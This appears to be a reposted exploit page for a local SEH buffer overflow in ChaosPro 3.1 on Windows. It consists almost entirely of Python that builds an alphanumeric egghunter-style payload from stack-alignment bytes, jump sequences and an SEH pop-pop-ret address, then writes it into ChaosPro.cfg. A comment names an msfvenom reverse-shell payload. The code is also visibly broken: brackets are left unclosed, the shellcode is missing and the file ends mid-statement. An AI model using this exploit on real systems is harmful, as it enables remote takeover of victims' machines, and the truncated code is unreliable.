Chaospro 3.1 seh buffer overflow Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2019-09-02 | Type : local | Platform : windows
This exploit / vulnerability Chaospro 3.1 seh buffer overflow is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...


# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post :

# our egg!
payload = "T00WT00W"

# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"

#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'


# stack alignment
pop_esp = "\x5c"
pop_eax = "\x58"
push_eax = "\x50"
push_esp = "\x54"
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"

#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"

#line containing our payload
line_start = "Username "
line_start += payload + "\n"

#line with our overflow
line_start += "ProjectPath "
junk = line_start

#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522

#junk += alpha_numeric_hex
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)

# baby nopsled
junk += "A" * 9

# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp

# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax

# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax

# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax

# size for section one
junk += "A" * (
- 9 # nopsled

# aligning the stack
- len(zero_eax)
- len(push_esp)
- len(pop_eax)
- len(align_stack)
- len(push_eax)
- len(pop_esp)

# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#Section Two

# baby nopsled
junk += "AAA"

# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax

# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax

# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax

# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax

junk += "A" * (
126 # amount of room before we need to jump

- 3 # baby nopsled

# part one of fourth set of bytes going onto the stack
- len(zero_eax)

# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)

# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- 4 # baby nopsled
- len(jmpback80)

# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

# baby nopsled
junk += "AAAA"

# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax

# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax

junk += "A" * (
126 # amount of room before we need to jump

- len(jmpback80)

- 4 # baby nopsled

# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)

# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- len(jmpforward06)

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x5d\x10\x40"

# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file: